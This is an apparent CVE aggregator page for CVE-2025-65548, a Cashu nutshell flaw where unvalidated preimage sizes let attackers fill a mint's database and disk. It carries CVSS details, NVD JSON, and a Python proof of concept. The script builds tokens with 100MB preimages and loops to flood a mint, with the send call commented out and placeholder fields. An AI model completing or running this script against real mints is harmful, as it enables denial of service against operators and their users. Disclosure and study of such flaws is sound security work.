Security Vulnerability Report
中文
CVE-2025-65548 CVSS 9.1 CRITICAL

CVE-2025-65548

Published: 2025-12-08 19:15:51
Last Modified: 2025-12-15 15:56:45
Source: [email protected]

Description

NUT-14 allows cashu tokens to be created with a preimage hash. However, nutshell (cashubtc/nuts) before 0.18.0 do not validate the size of preimage when the token is spent. The preimage is stored by the mint and attacker can exploit this vulnerability to fill the mint's db nd disk with arbitrary data.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:cashu:nutshell:*:*:*:*:*:*:*:* - VULNERABLE
nutshell < 0.18.0
cashubtc/nuts < 0.18.0
所有实现NUT-14且未修复的Cashu mint实现

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65548 PoC - Cashu Token Preimage Size Validation Bypass Note: This PoC is for educational and security research purposes only. """ import json import hashlib import base64 def generate_malicious_token(preimage_size_mb=100): """ Generate a Cashu token with oversized preimage """ # Generate arbitrary large preimage data preimage = b'\x00' * (preimage_size_mb * 1024 * 1024) preimage_hash = hashlib.sha256(preimage).hexdigest() # Construct NUT-14 token with oversized preimage token = { "mint": "https://your-mint.example.com", " proofs": [ { "amount": 1, "C": "02" + "00" * 32, # Dummy C value "secret": "preimage:" + preimage_hash, "preimage": base64.b64encode(preimage).decode(), # Oversized preimage "id": "nut14-proof-id" } ] } return token def exploit_mint(mint_url, num_tokens=10, preimage_size_mb=100): """ Exploit the mint by sending tokens with oversized preimages """ print(f"[*] Generating {num_tokens} malicious tokens...") print(f"[*] Preimage size: {preimage_size_mb}MB per token") print(f"[*] Total potential data to fill: {num_tokens * preimage_size_mb}MB") for i in range(num_tokens): token = generate_malicious_token(preimage_size_mb) # In real attack, send token to mint's /split or /melt endpoint print(f"[+] Token {i+1}/{num_tokens} generated and ready to send") # requests.post(f"{mint_url}/api/v1/split", json=token) print("[*] Attack completed - mint should have consumed significant disk space") if __name__ == "__main__": print("CVE-2025-65548 PoC - Cashu NUT-14 Preimage Size Validation Bypass") print("=" * 70) # Example usage exploit_mint("https://vulnerable-mint.example.com", num_tokens=100, preimage_size_mb=10)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65548", "sourceIdentifier": "[email protected]", "published": "2025-12-08T19:15:50.677", "lastModified": "2025-12-15T15:56:44.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NUT-14 allows cashu tokens to be created with a preimage hash. However, nutshell (cashubtc/nuts) before 0.18.0 do not validate the size of preimage when the token is spent. The preimage is stored by the mint and attacker can exploit this vulnerability to fill the mint's db nd disk with arbitrary data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cashu:nutshell:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.18.0", "matchCriteriaId": "18B13554-7C21-41F2-8C36-1154EBD3CBB4"}]}]}], "references": [{"url": "https://bitcointalk.org/index.php?topic=5564329", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://delvingbitcoin.org/t/public-disclosure-denial-of-service-using-htlc-in-cashu/2090", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/cashubtc/nuts/blob/main/07.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cashubtc/nuts/blob/main/14.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/jamesob/delving-bitcoin-archive/blob/master/archive/rendered-topics/2025-11-November/2025-11-02-public-disclosure-denial-of-service-using-htlc-in-cashu-id2090.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://preimage007.github.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://bitcointalk.org/index.php?topic=5564329", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/jamesob/delving-bitcoin-archive/blob/master/archive/rendered-topics/2025-11-November/2025-11-02-public-disclosure-denial-of-service-using-htlc-in-cashu-id2090.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.